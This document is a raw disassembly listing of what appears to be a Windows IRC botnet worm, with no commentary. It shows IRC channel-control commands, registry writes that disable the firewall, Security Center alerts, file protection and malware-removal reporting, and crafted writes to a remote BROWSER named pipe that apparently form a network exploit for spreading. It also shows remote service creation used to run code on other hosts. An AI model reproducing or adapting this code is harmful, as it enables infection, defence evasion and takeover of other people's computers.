push offset aCtc2 ; "ctc2"
call sub_412069
push offset aRModeChanO1 ; "r MODE $chan +o $1"
push offset aOps ; "ops"
call sub_412069
push offset aRModeChanV1 ; "r MODE $chan +v $1"
push offset aVoice ; "voice"
call sub_412069
push offset aRModeChanH1 ; "r MODE $chan +h $1"
push offset aHalfop ; "halfop"
call sub_412069
add esp, 44h
push offset aRModeChanB1 ; "r MODE $chan +b $1"
push offset aBan ; "ban"
call sub_412069
push edi
push offset a5000 ; "5000"
push offset aWaittokillserv ; "WaitToKillServiceT"
mov esi, 80000002h
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control"
push esi
call sub_41A8F2
push 0FFFEh
mov edi, offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"...
push offset aMaxuserport ; "MaxUserPort"
push edi
push esi
call sub_41A8D1
push 1Eh
push offset aTcptimedwaitde ; "TcpTimedWaitDelay"
push edi
push esi
call sub_41A8D1
push 1
push offset aStricttimewait ; "StrictTimeWaitSeqCheck"
push edi
push esi
call sub_41A8D1
add esp, 4Ch
push 1
push offset aTcp1323opts ; "Tcp1323Opts"
push edi
push esi
call sub_41A8D1
push 3EBC0h
push offset aGlobalmaxtcpwi ; "GlobalMaxTcpWindowSize"
push edi
push esi
call sub_41A8D1
push 3EBC0h
push offset aTcpwindowsize ; "TcpWindowSize"
push edi
push esi
call sub_41A8D1
push 1
push offset aEnablepmtudisc ; "EnablePMTUDiscovery"
push edi
push esi
call sub_41A8D1
add esp, 40h
push ebx
push offset aEnablepmtubhde ; "EnablePMTUBHDetect"
push edi
push esi
call sub_41A8D1
push 1
push offset aSackopts ; "SackOpts"
push edi
push esi
call sub_41A8D1
push 40h
push offset aDefaultttl ; "DefaultTTL"
push edi
push esi
call sub_41A8D1
push 2
push offset aTcpmaxdupacks ; "TcpMaxDupAcks"
push edi
push esi
call sub_41A8D1
add esp, 40h
push 0C8000h
push offset aLargebuffersiz ; "LargeBufferSize"
push edi
push esi
call sub_41A8D1
push 1
push offset aAllowuserrawac ; "AllowUserRawAccess"
push edi
push esi
call sub_41A8D1
push 1
push offset aDisablerawsecu ; "DisableRawSecurity"
push offset aSystemCurren_1 ; "SYSTEM\\CurrentControlSet\\Services\\Afd\\P"...
push esi
call sub_41A8D1
push 0FFFEh
push offset aMaxconnections ; "MaxConnectionsPer1_0Server"
mov edi, 80000001h
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push edi
call sub_41A8D1
add esp, 40h
push 0FFFEh
push offset aMaxconnectio_0 ; "MaxConnectionsPerServer"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push edi
call sub_41A8D1
push 4000h
mov edi, offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push offset aSizreqbuf ; "SizReqBuf"
push edi
push esi
call sub_41A8D1
push 0FFFFFF9Dh
push offset aSfcdisable ; "SFCDisable"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_41A8D1
push ebx
push offset aSfcscan ; "SFCScan"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_41A8D1
add esp, 40h
push 1
push offset aAutoshareserve ; "AutoShareServer"
push edi
push esi
call sub_41A8D1
push 1
push offset aAutosharewks ; "AutoShareWks"
push edi
push esi
call sub_41A8D1
push ebx
mov edi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push offset aEnablefirewall ; "EnableFirewall"
push edi
push esi
call sub_41A8D1
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push edi
push esi
call sub_41A8D1
add esp, 40h
push 1
push offset aDisablenotific ; "DisableNotifications"
push edi
push esi
call sub_41A8D1
push ebx
mov edi, offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push offset aEnablefirewall ; "EnableFirewall"
push edi
push esi
call sub_41A8D1
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push edi
push esi
call sub_41A8D1
push 1
push offset aDisablenotific ; "DisableNotifications"
push edi
push esi
call sub_41A8D1
add esp, 40h
mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push 1
push offset aAntivirusdisab ; "AntiVirusDisableNotify"
push edi
push esi
call sub_41A8D1
push 1
push offset aAntivirusoverr ; "AntiVirusOverride"
push edi
push esi
call sub_41A8D1
push 1
push offset aFirewalldisabl ; "FirewallDisableNotify"
push edi
push esi
call sub_41A8D1
push 1
push offset aFirewalloverri ; "FirewallOverride"
push edi
push esi
call sub_41A8D1
add esp, 40h
push 1
push offset aDontreportinfe ; "DontReportInfectionInformation"
push offset aSoftwarePoli_0 ; "SOFTWARE\\Policies\\Microsoft\\MRT"
push esi
call sub_41A8D1
add esp, 10h
call sub_4146B9
lea eax, [esp+3E8h+var_3D8]
push eax
push ebx
push ebx
push offset sub_414810
push ebx
push ebx
call ebp ; dword_42F158
lea eax, [esp+3E8h+var_3D8]
push eax
push ebx
push ebx
push offset sub_41477A
push ebx
push ebx
call ebp ; dword_42F158
lea eax, [esp+3E8h+var_3D8]
push eax
push ebx
push ebx
push offset sub_414983
push ebx
push ebx
call ebp ; dword_42F158
lea eax, [esp+3E8h+var_3D8]
push eax
push ebx
push ebx
push offset sub_414CF1
push ebx
push ebx
call ebp ; dword_42F158
lea eax, [esp+3E8h+var_3D8]
push eax
push ebx
push ebx
push offset sub_414FE3
push ebx
push ebx
call ebp ; dword_42F158
mov esi, offset dword_4554F8
push 100h
push esi
call dword_454324 ; gethostname
push esi
call dword_454398 ; gethostbyname
mov dword_4552E0, eax
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_45439C ; inet_ntoa
push 10h
push eax
push offset dword_455388
mov dword_4553A0, eax
call sub_4222F0
push offset dword_4554B0
mov dword_45539C, ebx
call sub_41A1C8
add esp, 10h
mov esi, offset dword_4554B0
jmp loc_4127A6
; ---------------------------------------------------------------------------
loc_412711: ; CODE XREF: sub_412267+548�j
mov ecx, esi
call sub_411123
test al, al
jnz short loc_412778
call sub_41F621
call dword_454218 ; DnsFlushResolverCache
mov eax, dword_45539C
mov ecx, esi
mov edi, eax
imul eax, 0B8h
add eax, offset byte_4396F7
imul edi, 0B8h
push eax
push 0Ch
push 1
call sub_410806
push eax
push 4
push 8
mov ecx, esi
call sub_410806
push eax
push 5
push 7
mov ecx, esi
call sub_410806
push eax
lea eax, dword_439658[edi]
push dword_439708[edi]
mov ecx, esi
push eax
call sub_40FFB4
loc_412778: ; CODE XREF: sub_412267+4B3�j
mov ecx, esi
call sub_4101D2
push 1F40h
call dword_42F15C ; Sleep
mov eax, dword_43C170
dec eax
cmp dword_45539C, eax
jnz short loc_4127A0
mov dword_45539C, ebx
jmp short loc_4127A6
; ---------------------------------------------------------------------------
loc_4127A0: ; CODE XREF: sub_412267+52F�j
inc dword_45539C
loc_4127A6: ; CODE XREF: sub_412267+4A5�j
; sub_412267+537�j
mov ecx, esi
call sub_411127
test al, al
jnz loc_412711
call sub_41BFDA
call dword_454258 ; WSACleanup
push dword_4555FC
call dword_42F084 ; ReleaseMutex
push ebx
call dword_42F150 ; ExitThread
loc_4127D3: ; DATA XREF: .text:0043200C�o
jmp $+5
mov eax, dword_43C810
add eax, 6
mov dword_45560C, eax
retn
sub_412267 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127E6 proc near ; CODE XREF: sub_4127E6+D0�p
; sub_4128D4+4A7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_4127FA
or [ebp+arg_7], 1
jmp short loc_4127FE
; ---------------------------------------------------------------------------
loc_4127FA: ; CODE XREF: sub_4127E6+C�j
and [ebp+arg_7], 0FEh
loc_4127FE: ; CODE XREF: sub_4127E6+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_412822
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_412834
; ---------------------------------------------------------------------------
loc_412822: ; CODE XREF: sub_4127E6+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_412834: ; CODE XREF: sub_4127E6+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_422F79
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_4128CD
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_4223F0
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_42F07C ; WriteFile
test eax, eax
jz short loc_4128C4
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_4128C4
push [ebp+arg_20]
call sub_4230B3
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_4128C0
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_4127E6
add esp, 2Ch
jmp short loc_4128CF
; ---------------------------------------------------------------------------
loc_4128C0: ; CODE XREF: sub_4127E6+B3�j
mov al, 1
jmp short loc_4128CF
; ---------------------------------------------------------------------------
loc_4128C4: ; CODE XREF: sub_4127E6+9C�j
; sub_4127E6+A4�j
push [ebp+arg_20]
call sub_4230B3
pop ecx
loc_4128CD: ; CODE XREF: sub_4127E6+61�j
xor al, al
loc_4128CF: ; CODE XREF: sub_4127E6+D8�j
; sub_4127E6+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4127E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128D4 proc near ; CODE XREF: .text:00412E9E�p
var_60E0 = byte ptr -60E0h
var_40E0 = byte ptr -40E0h
var_20E0 = byte ptr -20E0h
var_E0 = byte ptr -0E0h
var_CC = dword ptr -0CCh
var_C0 = byte ptr -0C0h
var_BC = byte ptr -0BCh
var_BB = byte ptr -0BBh
var_BA = byte ptr -0BAh
var_B9 = byte ptr -0B9h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = dword ptr -0B0h
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = word ptr -0A0h
var_9E = byte ptr -9Eh
var_9C = byte ptr -9Ch
var_8C = dword ptr -8Ch
var_88 = byte ptr -88h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = qword ptr -6Ch
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_B8 = dword ptr 0C0h
arg_D0 = dword ptr 0D8h
push ebp
mov ebp, esp
mov eax, 60E0h
call sub_4220C0
push ebx
push esi
push edi
lea eax, [ebp+arg_0]
push offset a__0 ; "."
push eax
call sub_424380
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
mov esi, 2000h
jz short loc_412947
lea eax, [ebp+arg_0]
push eax
push offset loc_438FF8
lea eax, [ebp+var_20E0]
push esi
push eax
call sub_42219B
push 20h
lea eax, [ebp+var_E0]
push ebx
push eax
call sub_4221F0
lea eax, [ebp+var_20E0]
add esp, 1Ch
mov [ebp+var_CC], eax
mov eax, offset byte_44D6A4
push ebx
push eax
push eax
lea eax, [ebp+var_E0]
push eax
call sub_421C72
loc_412947: ; CODE XREF: sub_4128D4+29�j
lea eax, [ebp+arg_0]
push eax
push offset aSPipeBrowser ; "\\\\%s\\pipe\\BROWSER"
lea eax, [ebp+var_40E0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_40E0]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+var_C+4], eax
jnz short loc_41298C
loc_412985: ; CODE XREF: sub_4128D4+271�j
; sub_4128D4+389�j ...
xor al, al
jmp loc_412E5F
; ---------------------------------------------------------------------------
loc_41298C: ; CODE XREF: sub_4128D4+AF�j
push 48h
lea eax, [ebp+var_BC]
push ebx
push eax
call sub_4221F0
push 10h
xor edi, edi
pop eax
inc edi
mov [ebp+var_B8], eax
push eax
lea eax, [ebp+var_9C]
push offset dword_43C858
push eax
mov [ebp+var_BC], 5
mov [ebp+var_BB], bl
mov [ebp+var_BA], 0Bh
mov [ebp+var_B9], 3
mov [ebp+var_B4], 48h
mov [ebp+var_B2], bx
mov [ebp+var_B0], ebx
mov [ebp+var_AC], 10B8h
mov [ebp+var_AA], 10B8h
mov [ebp+var_A8], ebx
mov [ebp+var_A4], edi
mov [ebp+var_A0], bx
mov [ebp+var_9E], 1
call sub_4223F0
push 10h
lea eax, [ebp+var_88]
push offset dword_43C844
push eax
mov [ebp+var_8C], 3
call sub_4223F0
add esp, 24h
lea eax, [ebp+var_C0]
mov [ebp+var_78], 2
push ebx
push eax
lea eax, [ebp+var_BC]
push 48h
push eax
push dword ptr [ebp+var_C+4]
call dword_42F07C ; WriteFile
test eax, eax
jnz short loc_412A6B
push 7D0h
call dword_42F15C ; Sleep
jmp loc_412B3C
; ---------------------------------------------------------------------------
loc_412A6B: ; CODE XREF: sub_4128D4+185�j
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_60E0]
push esi
push eax
push dword ptr [ebp+var_C+4]
call dword_42F054 ; ReadFile
push ebx
call sub_4241D4
push eax
call sub_4220EF
push 14h
lea eax, [ebp+var_74]
push 41h
push eax
call sub_4221F0
push 1Ch
lea eax, [ebp+var_34]
push 41h
push eax
call sub_4221F0
add esp, 20h
call sub_4220FC
mov esi, [ebp+arg_D0]
mov [ebp+var_74], eax
mov dword ptr [ebp+var_6C+4], edi
mov dword ptr [ebp+var_6C], ebx
lea esi, [esi+esi*4]
mov [ebp+var_70], edi
shl esi, 2
mov word ptr [ebp+var_64], bx
mov [ebp+var_2C], ebx
cmp byte_43C7F8[esi], bl
jz short loc_412AE5
push 4
mov [ebp+var_28], edi
mov [ebp+var_30], edi
push offset dword_455610
jmp short loc_412AF5
; ---------------------------------------------------------------------------
loc_412AE5: ; CODE XREF: sub_4128D4+200�j
push 2
pop eax
push 4
mov [ebp+var_28], eax
mov [ebp+var_30], eax
push offset loc_43C83C
loc_412AF5: ; CODE XREF: sub_4128D4+20F�j
lea eax, [ebp+var_24]
push eax
call sub_4223F0
add esp, 0Ch
call sub_4220FC
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_34], edx
call sub_4220FC
cdq
idiv edi
mov eax, dword_43C7EC[esi]
mov [ebp+var_1C], ebx
push eax
mov [ebp+arg_D0], eax
inc edx
mov [ebp+var_20], edx
call sub_422F79
mov edi, eax
pop ecx
cmp edi, ebx
jnz short loc_412B4A
loc_412B3C: ; CODE XREF: sub_4128D4+192�j
push dword ptr [ebp+var_C+4]
call dword_42F038 ; CloseHandle
jmp loc_412985
; ---------------------------------------------------------------------------
loc_412B4A: ; CODE XREF: sub_4128D4+266�j
mov eax, [ebp+arg_D0]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_4221F0
mov eax, [ebp+arg_D0]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_4221F0
mov eax, dword_43C7F4[esi]
push 7
add eax, edi
push offset dword_43C7E0
push eax
mov [ebp+var_4], eax
call sub_4223F0
push dword_43C814
mov eax, [ebp+var_4]
add eax, 7
push offset dword_432980
push eax
call sub_4223F0
mov eax, dword_43C7F0[esi]
add esp, 30h
mov [ebp+var_4], eax
add eax, edi
cmp byte_43C7F8[esi], bl
jz short loc_412C02
push 4
push offset dword_45560C
push eax
call sub_4223F0
add [ebp+var_4], 0Ch
mov esi, offset dword_43C810
mov eax, [ebp+var_4]
push 4
add eax, edi
push esi
push eax
call sub_4223F0
mov eax, [ebp+var_4]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+var_4], eax
call sub_4223F0
mov eax, [ebp+var_4]
push 4
add eax, 0Ch
push esi
push eax
call sub_4223F0
add esp, 30h
jmp short loc_412C28
; ---------------------------------------------------------------------------
loc_412C02: ; CODE XREF: sub_4128D4+2E1�j
mov [ebp+var_4], eax
mov dword ptr [ebp+var_C], 10h
mov esi, offset dword_43C810
loc_412C11: ; CODE XREF: sub_4128D4+352�j
push 4
push esi
push [ebp+var_4]
call sub_4223F0
add [ebp+var_4], 4
add esp, 0Ch
dec dword ptr [ebp+var_C]
jnz short loc_412C11
loc_412C28: ; CODE XREF: sub_4128D4+32C�j
mov eax, [ebp+arg_D0]
add eax, 42h
push eax
call sub_422F79
mov esi, eax
mov dword ptr [esp+8+var_C+4], 7D0h
mov dword ptr [ebp+var_C], esi
call dword_42F15C ; Sleep
cmp esi, ebx
jnz short loc_412C62
push dword ptr [ebp+var_C+4]
call dword_42F038 ; CloseHandle
push edi
call sub_4230B3
pop ecx
jmp loc_412985
; ---------------------------------------------------------------------------
loc_412C62: ; CODE XREF: sub_4128D4+377�j
mov eax, [ebp+arg_D0]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_4221F0
lea eax, [ebp+var_74]
push 14h
push eax
push esi
call sub_4223F0
mov eax, [ebp+arg_D0]
mov dword ptr [ebp+var_14+4], ebx
mov dword ptr [ebp+var_14], eax
add esp, 10h
fild [ebp+var_14]
fmul flt_42F31C
fstp [esp+0Ch+var_C]
call sub_4242B0
call sub_4234BC
push [ebp+arg_D0]
mov [esi+1Ch], eax
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
mov [esi+18h], ebx
call sub_4223F0
mov eax, [ebp+arg_D0]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+var_4], eax
jz short loc_412CD8
loc_412CD0: ; CODE XREF: sub_4128D4+3FF�j
inc eax
test al, 3
jnz short loc_412CD0
mov [ebp+var_4], eax
loc_412CD8: ; CODE XREF: sub_4128D4+3FA�j
lea ecx, [ebp+var_34]
push 1Ch
add eax, esi
push ecx
push eax
call sub_4223F0
add [ebp+var_4], 1Ch
push edi
call sub_4230B3
push 18h
lea eax, [ebp+var_4C]
push ebx
push eax
call sub_4221F0
push 14h
lea eax, [ebp+var_60]
push ebx
push eax
mov [ebp+var_4C], 5
mov [ebp+var_4B], bl
mov [ebp+var_4A], bl
mov [ebp+var_49], 3
mov [ebp+var_48], 10h
mov [ebp+var_42], bx
mov [ebp+var_40], ebx
mov [ebp+var_38], bx
mov [ebp+var_36], 1Fh
call sub_4221F0
add esp, 28h
push ebx
push ebx
push 1
push ebx
call dword_42F094 ; CreateEventA
mov [ebp+var_50], eax
mov byte ptr [ebp+arg_D0+3], bl
mov dword ptr [ebp+var_14+4], ebx
loc_412D48: ; CODE XREF: sub_4128D4+53A�j
cmp dword ptr [ebp+var_14+4], 2
jge loc_412E3A
inc dword ptr [ebp+var_14+4]
push 7D0h
call dword_42F15C ; Sleep
push 1
push 10B8h
push [ebp+var_4]
push esi
lea esi, [ebp+var_4C]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push dword ptr [ebp+var_C+4]
rep movsd
call sub_4127E6
add esp, 2Ch
test al, al
jz loc_412E37
cmp [ebp+var_50], ebx
jz short loc_412E05
lea eax, [ebp+var_60]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_60E0]
push 2000h
push eax
push dword ptr [ebp+var_C+4]
call dword_42F054 ; ReadFile
test eax, eax
jnz short loc_412DC2
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_412985
loc_412DC2: ; CODE XREF: sub_4128D4+4DB�j
push 3E8h
push [ebp+var_50]
call dword_42F064 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_412E05
movzx eax, word_439014
push eax
lea esi, [ebp+arg_0]
sub esp, 0D0h
mov byte ptr [ebp+arg_D0+3], 1
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jnz short loc_412E16
loc_412E05: ; CODE XREF: sub_4128D4+4BA�j
; sub_4128D4+501�j
cmp byte ptr [ebp+arg_D0+3], bl
mov esi, dword ptr [ebp+var_C]
jz loc_412D48
jmp short loc_412E3A
; ---------------------------------------------------------------------------
loc_412E16: ; CODE XREF: sub_4128D4+52F�j
push 7D0h
call dword_42F15C ; Sleep
mov eax, [ebp+arg_B8]
lea eax, [eax+eax*8]
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
mov al, 1
jmp short loc_412E5F
; ---------------------------------------------------------------------------
loc_412E37: ; CODE XREF: sub_4128D4+4B1�j
mov esi, dword ptr [ebp+var_C]
loc_412E3A: ; CODE XREF: sub_4128D4+478�j
; sub_4128D4+540�j
push dword ptr [ebp+var_C+4]
mov edi, dword_42F038
call edi ; dword_42F038
push esi
call sub_4230B3
cmp [ebp+var_50], ebx
pop ecx
jz short loc_412E56
push [ebp+var_50]
call edi ; dword_42F038
loc_412E56: ; CODE XREF: sub_4128D4+57B�j
cmp byte ptr [ebp+arg_D0+3], bl
setnz al
loc_412E5F: ; CODE XREF: sub_4128D4+B3�j
; sub_4128D4+561�j
pop edi
pop esi
pop ebx
leave
retn
sub_4128D4 endp
; ---------------------------------------------------------------------------
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [esp+18h]
push ebx
push eax
call sub_401AB3
pop ecx
cmp eax, ebx
pop ecx
jnz short loc_412E7F
loc_412E7B: ; CODE XREF: .text:00412E82�j
push 0
jmp short loc_412E8A
; ---------------------------------------------------------------------------
loc_412E7F: ; CODE XREF: .text:00412E79�j
cmp eax, 2
jz short loc_412E7B
cmp eax, 3
jnz short loc_412EB1
push ebx
loc_412E8A: ; CODE XREF: .text:00412E7D�j
sub esp, 0D0h
lea esi, [esp+0ECh]
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_4128D4
add esp, 0D4h
test al, al
jz short loc_412EB1
mov eax, ebx
jmp short loc_412EB3
; ---------------------------------------------------------------------------
loc_412EB1: ; CODE XREF: .text:00412E87�j
; .text:00412EAB�j
xor eax, eax
loc_412EB3: ; CODE XREF: .text:00412EAF�j
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412EB7 proc near ; CODE XREF: sub_4130E5+3DA�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push [ebp+arg_4]
call dword_454304 ; OpenSCManagerA
xor esi, esi
mov [ebp+var_4], eax
cmp eax, esi
jz loc_41301D
push [ebp+arg_10]
lea eax, [ebp+var_208]
push [ebp+arg_0]
push [ebp+arg_4]
push offset aSSS_1 ; "%s\\%s\\%s"
push eax
call sub_422063
add esp, 14h
call sub_4220FC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
idiv edi
lea eax, [ebp+var_104]
push edx
push offset aDDDDD ; "%d%d%d%d%d"
push eax
call sub_422063
add esp, 1Ch
loc_412F4C: ; DATA XREF: .text:off_442260�o
lea eax, [ebp+var_208]
mov edi, 0F01FFh
push esi
push esi
push esi
push esi
push esi
push eax
push 1
push 3
push 20h
lea eax, [ebp+var_104]
push edi
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_4]
call dword_45437C ; CreateServiceA
mov ebx, eax
cmp ebx, esi
jnz short loc_412F89
push [ebp+var_4]
jmp loc_413017
; ---------------------------------------------------------------------------
loc_412F89: ; CODE XREF: sub_412EB7+C8�j
push esi
push esi
push ebx
call dword_4541DC ; StartServiceA
test eax, eax
jz short loc_412FBD
push 1F4h
call dword_42F15C ; Sleep
push ebx
call dword_454250 ; DeleteService
push [ebp+var_4]
call dword_4541F0 ; CloseServiceHandle
push ebx
loc_412FB2: ; CODE XREF: sub_412EB7+14D�j
call dword_4541F0 ; CloseServiceHandle
xor eax, eax
inc eax
jmp short loc_41301F
; ---------------------------------------------------------------------------
loc_412FBD: ; CODE XREF: sub_412EB7+DD�j
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 41Dh
jnz short loc_413006
push edi
push offset dword_439068
push [ebp+var_4]
call dword_4541D4 ; OpenServiceA
mov edi, eax
cmp edi, esi
jz short loc_413006
push esi
push esi
push edi
call dword_4541DC ; StartServiceA
test eax, eax
jz short loc_413006
push ebx
call dword_454250 ; DeleteService
push [ebp+var_4]
call dword_4541F0 ; CloseServiceHandle
push ebx
call dword_4541F0 ; CloseServiceHandle
push edi
jmp short loc_412FB2
; ---------------------------------------------------------------------------
loc_413006: ; CODE XREF: sub_412EB7+111�j
; sub_412EB7+126�j ...
push ebx
call dword_454250 ; DeleteService
push [ebp+var_4]
call dword_4541F0 ; CloseServiceHandle
push ebx
loc_413017: ; CODE XREF: sub_412EB7+CD�j
call dword_4541F0 ; CloseServiceHandle
loc_41301D: ; CODE XREF: sub_412EB7+26�j
xor eax, eax
loc_41301F: ; CODE XREF: sub_412EB7+104�j
pop edi
pop esi
pop ebx
leave
retn
sub_412EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413024 proc near ; CODE XREF: sub_4130E5+4A7�p
var_3AC = byte ptr -3ACh
var_1A4 = byte ptr -1A4h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3ACh
push ebx
push edi
lea eax, [ebp+var_1A4]
push 190h
mov edi, dword_42F098
push eax
push 0FFFFFFFFh
xor ebx, ebx
push [ebp+arg_0]
mov [ebp+var_4], ebx
push ebx
push ebx
call edi ; dword_42F098
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_45422C
test eax, eax
jnz short loc_4130D6
mov ecx, [ebp+var_4]
cmp ecx, ebx
jz short loc_4130D6
mov eax, [ecx]
push esi
push 3Ch
xor edx, edx
pop esi
div esi
xor edx, edx
push 10h
push ebx
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
lea eax, [ebp+var_14]
push eax
mov esi, edx
call sub_4221F0
imul esi, 0EA60h
add esp, 0Ch
lea eax, [ebp+var_3AC]
mov [ebp+var_14], esi
push 208h
push eax
push 0FFFFFFFFh
push [ebp+arg_4]
push ebx
push ebx
call edi ; dword_42F098
lea eax, [ebp+var_3AC]
mov [ebp+var_8], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_454280
test eax, eax
pop esi
jnz short loc_4130D6
inc ebx
loc_4130D6: ; CODE XREF: sub_413024+3E�j
; sub_413024+45�j ...
push [ebp+var_4]
call dword_4543A0
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_413024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4130E5 proc near ; CODE XREF: sub_4135E8+34�p
var_404 = byte ptr -404h
var_300 = byte ptr -300h
var_200 = byte ptr -200h
var_FC = byte ptr -0FCh
var_F8 = dword ptr -0F8h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
